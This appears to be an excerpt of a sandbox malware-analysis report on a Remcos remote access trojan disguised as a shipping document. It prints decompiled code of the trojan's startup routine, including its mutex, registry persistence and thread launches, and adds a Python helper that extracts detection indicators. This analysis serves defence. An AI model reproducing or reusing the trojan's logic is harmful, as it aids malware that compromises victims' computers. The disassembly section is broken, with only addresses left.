                                          				void* _t70;
                                          				void* _t72;
                                          				CHAR* _t73;
                                          				void* _t80;
                                          				char _t81;
                                          				intOrPtr* _t82;
                                          				char* _t83;
                                          				void* _t84;
                                          				signed int _t85;
                                          				signed int _t87;
                                          				signed int _t89;
                                          				signed int _t91;
                                          				signed int _t93;
                                          				char* _t95;
                                          				char* _t96;
                                          				int _t97;
                                          				intOrPtr* _t98;
                                          				char _t101;
                                          				void* _t102;
                                          				intOrPtr* _t103;
                                          				CHAR* _t106;
                                          				char* _t109;
                                          				char* _t110;
                                          				char _t112;
                                          				char* _t115;
                                          				char* _t116;
                                          				char* _t117;
                                          				char* _t118;
                                          				intOrPtr* _t121;
                                          				char* _t124;
                                          				int _t125;
                                          				signed int _t126;
                                          				void* _t129;
                                          				intOrPtr* _t130;
                                          				void* _t140;
                                          				intOrPtr* _t141;
                                          				void* _t144;
                                          				char* _t147;
                                          				char _t148;
                                          				char _t149;
                                          				void* _t150;
                                          				void* _t151;
                                          				void* _t152;
                                          				void* _t156;
                                          				signed int _t160;
                                          				signed int _t162;
                                          				void* _t164;
                                          				void* _t165;
                                          				intOrPtr* _t166;
                                          				signed int _t168;
                                          				void* _t170;
                                          				intOrPtr* _t171;
                                          				void* _t174;
                                          				char* _t176;
                                          				char _t177;
                                          				unsigned int _t287;
                                          				signed int _t288;
                                          				void* _t324;
                                          				signed int _t329;
                                          				struct _SECURITY_ATTRIBUTES* _t338;
                                          				void* _t339;
                                          				void* _t341;
                                          				void* _t346;
                                          				void* _t347;
                                          				void* _t348;
                                          				void* _t351;
                                          				void* _t356;
                                          
                                          				_t356 = __eflags;
                                          				_t324 = __edx;
                                          				E00407C53( &_v48);
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( *0x415114,  &_v5);
                                          				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v48);
                                          				_t64 = E0040EFB5(_t356); // executed
                                          				E00408510(0x415940, _t64);
                                          				E00401B3C( &_v64);
                                          				_t68 =  &_v80;
                                          				L0040FC1A();
                                          				_t69 =  &_v64;
                                          				L0040FC20();
                                          				_t346 = _t341 - 0xfffffffffffffffc + 0x3c;
                                          				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t69, _t69, _t68, _t68, "Software\\", E00401289(0x415940, _t356, 0xe), 0x4108cc,  &_v64);
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          				_t338 = 0;
                                          				_v12 = 0;
                                          				_t70 = OpenMutexA(0x100000, 0, "Remcos_Mutex_Inj");
                                          				if(_t70 != 0) {
                                          					WaitForSingleObject(_t70, 0xea60);
                                          				}
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				_t72 = E00408E97(0x4157e8, 0x80000001,  &_v12, "Inj",  &_v12); // executed
                                          				_t347 = _t346 + 0x10;
                                          				_t358 = _t72;
                                          				if(_t72 != 0) {
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					E00409132(0x80000001, _t72, "Inj");
                                          					_t347 = _t347 + 0xc;
                                          				}
                                          				_t73 = E00401289(0x415940, _t358, 0xe);
                                          				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t73);
                                          				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          				CreateMutexA(_t338, 1, _t73); // executed
                                          				if(GetLastError() != 0xb7) {
                                          					E00407D38();
                                          					E00401000(__eflags);
                                          					GetModuleFileNameA(_t338, "C:\\Users\\hardz\\Desktop\\MV OLYMPIC PROGRESS VSL PARTICULARS.exe", 0x104);
                                          					_t80 = E00408EF1( &_v80, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName"); // executed
                                          					_t348 = _t347 + 0x10;
                                          					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t80);
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					_t81 = E0040F0B5( &_v80);
                                          					__eflags = _t81;
                                          					if(_t81 == 0) {
                                          						_push(" (32 bit)");
                                          					} else {
                                          						_push(" (64 bit)");
                                          					}
                                          					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z();
                                          					_t82 =  *0x415930;
                                          					__eflags = _t82 - _t338;
                                          					if(_t82 != _t338) {
                                          						 *0x41511c =  *_t82();
                                          					}
                                          					__eflags = _v12 - _t338;
                                          					if(__eflags == 0) {
                                          						_t176 = E00401289(0x415940, __eflags, 0x2e);
                                          						__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          						__eflags =  *_t176;
                                          						if(__eflags != 0) {
                                          							__eflags =  *0x415930 - _t338; // 0x7632e630
                                          							if(__eflags != 0) {
                                          								__eflags =  *0x41511c - _t338; // 0x1
                                          								if(__eflags == 0) {
                                          									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          									_t177 = E00408E4E(0x80000001, _t176, "origmsc");
                                          									_t348 = _t348 + 0xc;
                                          									__eflags = _t177;
                                          									if(__eflags == 0) {
                                          										E00402A78(0x4157e8, __eflags);
                                          									}
                                          								} else {
                                          									__imp__?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z("XP", _t338);
                                          									__eflags =  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB - _t176;
                                          									if(__eflags == 0) {
                                          										E00402B5B(__eflags);
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          					_t83 = E00401289(0x415940, __eflags, 0x27);
                                          					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					__eflags =  *_t83;
                                          					if(__eflags != 0) {
                                          						E004084B8();
                                          					}
                                          					_t84 = E00401289(0x415940, __eflags, 0xb);
                                          					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t84);
                                          					_t85 = E00401289(0x415940, __eflags, 4);
                                          					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					__eflags =  *_t85;
                                          					 *0x415808 = _t85 & 0xffffff00 | __eflags != 0x00000000;
                                          					_t87 = E00401289(0x415940, __eflags, 5);
                                          					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					__eflags =  *_t87;
                                          					 *0x415911 = _t87 & 0xffffff00 | __eflags != 0x00000000;
                                          					_t89 = E00401289(0x415940, __eflags, 6);
                                          					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					__eflags =  *_t89;
                                          					 *0x415910 = _t89 & 0xffffff00 | __eflags != 0x00000000;
                                          					_t91 = E00401289(0x415940, __eflags, 7);
                                          					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					__eflags =  *_t91;
                                          					 *0x4157e0 = _t91 & 0xffffff00 | __eflags != 0x00000000;
                                          					_t93 = E00401289(0x415940, __eflags, 8);
                                          					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					__eflags =  *_t93;
                                          					 *0x4157c8 = _t93 & 0xffffff00 | __eflags != 0x00000000;
                                          					_t95 = E00401289(0x415940, __eflags, 3);
                                          					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          					__eflags =  *_t95;
                                          					if(__eflags != 0) {
                                          						_t168 = E00401289(0x415940, __eflags, 0x30);
                                          						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          						asm("repne scasb");
                                          						__eflags =  !(_t168 | 0xffffffff) - 1;
                                          						if(__eflags != 0) {
                                          							_t170 = E00401289(0x415940, __eflags, 0x30);
                                          							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          							_t171 = E00401289(0x415940, __eflags, 9);
                                          							__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t170);
                                          							_t174 = E0040712F(); // executed
                                          							_t348 = _t348 + 0xc;
                                          							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t174,  &_v80,  *_t171);
                                          							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          						}
                                          					}
                                          					__eflags = _v12 - _t338;
                                          					if(__eflags != 0) {
                                          						L34:
                                          						_t96 = E00401289(0x415940, __eflags, 0x28);
                                          						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          						_t97 = atoi(_t96);
                                          						__eflags = _t97 - 2;
                                          						 *0x415938 = _t97;
                                          						if(_t97 != 2) {
                                          							__eflags = _t97 - 1;
                                          							if(__eflags != 0) {
                                          								L39:
                                          								_t98 = E00401289(0x415940, __eflags, 0xf);
                                          								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          								 *0x415118 =  *_t98;
                                          								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                          								_t101 = E00401289(0x415940, __eflags, 0x31);
                                          								__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t101, 0x410668);
                                          								__eflags = _t101;
                                          								if(__eflags == 0) {
                                          									_t102 = E00401289(0x415940, __eflags, 0x31);
                                          									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          									_t103 = E00401289(0x415940, __eflags, 0x10);
                                          									__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t102);
                                          									_t106 = E0040712F();
                                          									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t106,  &_v80,  *_t103);
                                          									__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          									CreateDirectoryA(_t106, _t338);
                                          									_t109 =  &_v64;
                                          									L0040FC20();
                                          									_t110 =  &_v80;
                                          									L0040FC14();
                                          									_t351 = _t348 + 0x24;
                                          									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t110, _t110, _t109, _t109, 0x415720, 0x4108cc, E00401289(0x415940, __eflags, 0x11));
                                          									__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          								} else {
                                          									_t140 = E00401289(0x415940, __eflags, 0x11);
                                          									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          									_t141 = E00401289(0x415940, __eflags, 0x10);
                                          									__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t140);
                                          									_t144 = E0040712F();
                                          									_t351 = _t348 + 0xc;
                                          									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t144,  &_v80,  *_t141);
                                          								}
                                          								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          								_t112 =  *0x415118 - 0x31;
                                          								__eflags = _t112;
                                          								if(_t112 == 0) {
                                          									_t351 = _t351 - 0x10;
                                          									__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                          									E00403774(0x4156c0,  &_v32);
                                          								} else {
                                          									__eflags = _t112 - 1;
                                          									if(__eflags == 0) {
                                          										_t351 = _t351 - 0x10;
                                          										__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                          										E004037D4(0x4156c0,  &_v32);
                                          									}
                                          								}
                                          								_t115 = E00401289(0x415940, __eflags, 0x14);
                                          								__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          								__eflags =  *_t115 - 1;
                                          								if(__eflags == 0) {
                                          									CreateThread(_t338, _t338, E0040E157, _t338, _t338, _t338);
                                          								}
                                          								_t116 = E00401289(0x415940, __eflags, 0x16);
                                          								__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          								__eflags =  *_t116 - 1;
                                          								if(__eflags == 0) {
                                          									CreateThread(_t338, _t338, E0040E157, 1, _t338, _t338);
                                          								}
                                          								_t117 = E00401289(0x415940, __eflags, 0x23);
                                          								__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          								__eflags =  *_t117 - 1;
                                          								if(__eflags == 0) {
                                          									_t129 = E00401289(0x415940, __eflags, 0x26);
                                          									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          									_t130 = E00401289(0x415940, __eflags, 0x25);
                                          									__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t129);
                                          									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040712F(),  &_v80,  *_t130);
                                          									__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          									CreateThread(_t338, _t338, E00401883, _t338, _t338, _t338);
                                          								}
                                          								_t118 = E00401289(0x415940, __eflags, 0x2b);
                                          								__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          								__eflags =  *_t118 - 1;
                                          								if(__eflags == 0) {
                                          									_t124 = E00401289(0x415940, __eflags, 0x2d);
                                          									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          									_t125 = atoi(_t124);
                                          									_t126 = E00401289(0x415940, __eflags, 0x2c);
                                          									__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          									 *_t126 =  *_t126 != 0;
                                          									E00405F6C(_t126 & 0xffffff00 |  *_t126 != 0x00000000, _t125);
                                          								}
                                          								__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(E0040E549( &_v80));
                                          								__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                          								_t121 =  *0x415960;
                                          								__eflags = _t121 - _t338;
                                          								if(_t121 != _t338) {
                                          									 *_t121(_t338);
                                          								}
                                          								E00409E73();
                                          								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          								goto L57;
                                          							}
                                          							_push(_t338);
                                          							L38:
                                          							E0040FAED(_t324);
                                          							CreateThread(_t338, _t338, E0040F8BF, _t338, _t338, _t338);
                                          							goto L39;
                                          						}
                                          						_push(1);
                                          						goto L38;
                                          					} else {
                                          						_t147 = E00401289(0x415940, __eflags, 3);
                                          						__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          						__eflags =  *_t147;
                                          						if(__eflags == 0) {
                                          							_t329 = 0x4157d0;
                                          							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z("C:\\Users\\hardz\\Desktop\\MV OLYMPIC PROGRESS VSL PARTICULARS.exe");
                                          						} else {
                                          							_t160 = E00401289(0x415940, __eflags, 0x1e);
                                          							__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          							__eflags =  *_t160;
                                          							_t162 = E00401289(0x415940, __eflags, 0xc);
                                          							__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t160 & 0xffffff00 | __eflags != 0x00000000);
                                          							__eflags =  *_t162;
                                          							_t164 = E00401289(0x415940, __eflags, 0xa);
                                          							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t162 & 0xffffff00 | __eflags != 0x00000000);
                                          							_t165 = E00401289(0x415940, __eflags, 0x30);
                                          							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t164);
                                          							_t166 = E00401289(0x415940, __eflags, 9);
                                          							__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t165);
                                          							_push( *_t166); // executed
                                          							_t147 = E0040650D(_t166); // executed
                                          							_t348 = _t348 + 0x14;
                                          							_t329 = 0x4157d0;
                                          						}
                                          						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          						_t148 = E00408E4E(0x80000001, _t147, "EXEpath");
                                          						_t348 = _t348 + 0xc;
                                          						__eflags = _t148;
                                          						if(__eflags == 0) {
                                          							__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          							_t152 = _t148 + 1;
                                          							L0040FCCC();
                                          							_v16 = _t152;
                                          							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t152);
                                          							asm("repne scasb");
                                          							_t287 =  !(_t329 | 0xffffffff);
                                          							_t339 = _t152 - _t287;
                                          							_t288 = _t287 >> 2;
                                          							_t156 = memcpy(_t339 + _t288 + _t288, _t339, memcpy(_v16, _t339, _t288 << 2) & 0x00000003);
                                          							__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          							__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                          							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                          							E0040FC2C(E004090D0(__eflags, 0x80000001, _t156 + 1, "EXEpath", _v16, _t156 + 1, _t156, _t156), _v16);
                                          							_t348 = _t348 + 0x38;
                                          							_t338 = 0;
                                          							__eflags = 0;
                                          						}
                                          						_t149 = E00401289(0x415940, __eflags, 0xd);
                                          						__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t149, "0");
                                          						__eflags = _t149;
                                          						if(__eflags == 0) {
                                          							goto L34;
                                          						} else {
                                          							_t150 = E00401289(0x415940, __eflags, 0xd);
                                          							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                          							_t151 = E00407E0B(_t150);
                                          							_t348 = _t348 - 0x10 + 0x10;
                                          							__eflags = _t151 - 1;
                                          							if(__eflags != 0) {
                                          								goto L34;
                                          							}
                                          							_push(3);
                                          							goto L6;
                                          						}
                                          					}
                                          				} else {
                                          					_push(1);
                                          					L6:
                                          					_pop(_t338);
                                          					L57:
                                          					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                          					return _t338;
                                          				}
                                          			}
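The fragment above is the tail of the initialisation routine at 00407452: it keys its branch on config string 0xd, walks the single-instance mutex path recorded in the APIs list (OpenMutexA, WaitForSingleObject, then CreateMutexA and GetLastError), and hands the sample's own path to a routine together with HKEY_CURRENT_USER (0x80000001) and the value name "EXEpath", while the subcall at 00407D38 resolves a fixed set of exports through LoadLibraryA/GetModuleHandleA and GetProcAddress. The helper below is an added example, not part of this Joe Sandbox report or of the sample's code: it parses call lines in the format the APIs list uses and pulls out the indicators a detection engineer would lift from such a listing, namely the export names resolved at run time, the registry root keys opened, and whether the mutex guard sequence is present (with its wait timeout decoded). The input lines are copied from this page's listing with the long stack-argument tails trimmed; the line-format regex and the "second stack argument is the export name" heuristic are assumptions about the Joe Sandbox output format, not a documented interface.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# Constructed input: call lines copied from the APIs listing of this report, with the
# trailing "?" stack arguments trimmed.  The argument column is a raw stack snapshot,
# so the export-name string pushed for the *next* GetProcAddress shows up as the
# second argument of the preceding LoadLibraryA/GetModuleHandleA line (assumption).
API_LINES = """\
• Part of subcall function 00407D38: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,00415978,00000000), ref: 00407D4B
• Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407D54
• Part of subcall function 00407D38: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?), ref: 00407D83
• Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407D86
• Part of subcall function 00407D38: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?), ref: 00407DB4
• Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407DB7
• Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?), ref: 00407DC9
• Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407DCC
• Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?), ref: 00407DED
• Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407DF0
• Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?), ref: 00407DFD
• Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407E00
• OpenMutexA.KERNEL32 ref: 00407506
• WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,004108CC,00000000), ref: 00407516
• CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?), ref: 0040757D
• GetLastError.KERNEL32(?,?), ref: 00407583
• Part of subcall function 00408EF1: RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020019,80000002), ref: 00408F12
• ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60( (32 bit),?,?), ref: 004075FC
"""

# Line format as printed on this page (assumed): "• [Part of subcall function SUB: ]Name.Module(args), ref: ADDR"
_CALL_RE = re.compile(
    r"^\s*[•*-]\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^.\s(]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
_IDENT = re.compile(r"^[A-Za-z_]\w*$")
_HEX = re.compile(r"^[0-9A-Fa-f]+$")
_HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}

@dataclass(frozen=True)
class Call:
    sub: Optional[str]      # enclosing "Part of subcall function", if any
    name: str
    module: str
    args: Tuple[str, ...]   # raw stack snapshot as printed by the sandbox
    ref: int                # call-site address

def parse_calls(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = _CALL_RE.match(line)
        if not m:
            continue                        # blank lines, headings, anything else
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw is not None else ()
        calls.append(Call(m.group("sub"), m.group("name"), m.group("mod"), args,
                          int(m.group("ref"), 16)))
    return calls

def resolved_imports(calls: List[Call]) -> Dict[str, Set[str]]:
    """DLL -> export names resolved at run time: LoadLibrary*/GetModuleHandle* whose
    second stack argument is an identifier, immediately followed by GetProcAddress
    inside the same subcall."""
    out: Dict[str, Set[str]] = {}
    for i, c in enumerate(calls[:-1]):
        nxt = calls[i + 1]
        if (c.name.startswith(("LoadLibrary", "GetModuleHandle")) and len(c.args) > 1
                and _IDENT.match(c.args[1]) and nxt.name == "GetProcAddress"
                and nxt.sub == c.sub):
            dll = c.args[0].lower()
            dll = dll[:-4] if dll.endswith(".dll") else dll
            out.setdefault(dll, set()).add(c.args[1])
    return out

def registry_roots(calls: List[Call]) -> List[Tuple[str, str, int]]:
    """(API, decoded root key, call site) for each RegOpenKeyEx*/RegCreateKeyEx* call."""
    found = []
    for c in calls:
        if c.name.startswith(("RegOpenKeyEx", "RegCreateKeyEx")) and c.args and _HEX.match(c.args[0]):
            root = int(c.args[0], 16)
            found.append((c.name, _HKEY.get(root, "0x%08X" % root), c.ref))
    return found

def single_instance_guard(calls: List[Call]) -> Dict[str, object]:
    """Detect OpenMutex -> WaitForSingleObject -> CreateMutex -> GetLastError in order
    and decode the wait timeout (0xEA60 on this page = 60 000 ms)."""
    want = ("OpenMutex", "WaitForSingleObject", "CreateMutex", "GetLastError")
    pos, wait_ms = 0, None
    for c in calls:
        if pos < len(want) and c.name.startswith(want[pos]):
            if want[pos] == "WaitForSingleObject" and len(c.args) > 1 and _HEX.match(c.args[1]):
                wait_ms = int(c.args[1], 16)
            pos += 1
    return {"present": pos == len(want), "wait_ms": wait_ms}

def summarize(text: str) -> Dict[str, object]:
    calls = parse_calls(text)
    return {"calls": len(calls),
            "resolved_imports": resolved_imports(calls),
            "registry_roots": registry_roots(calls),
            "single_instance": single_instance_guard(calls)}

if __name__ == "__main__":
    for key, value in summarize(API_LINES).items():
        print(key, value)
```

Run as a script it prints the three indicator sets for the lines above. The export-name heuristic is only a heuristic: the argument columns are stack snapshots rather than decoded parameters, so confirm each name against the disassembly (here the strings at 00407D38 onward) before it goes into a rule.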
                                          [Disassembly listing for the function at 0x00407452: only the address column (0x00407452 through 0x00407c50, plus subcall references) survived extraction; the instruction column is absent.]

                                          APIs
                                            • Part of subcall function 00407C53: malloc.MSVCRT ref: 00407C76
                                            • Part of subcall function 00407C53: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00407CA2
                                            • Part of subcall function 00407C53: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407CAE
                                            • Part of subcall function 00407C53: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407CB7
                                            • Part of subcall function 00407C53: malloc.MSVCRT ref: 00407CC8
                                            • Part of subcall function 00407C53: free.MSVCRT(?,?,?,?,dt@,00000000), ref: 00407D13
                                            • Part of subcall function 00407C53: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00407D21
                                            • Part of subcall function 00407C53: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407D2A
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000), ref: 00407473
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00407482
                                            • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                            • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                            • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
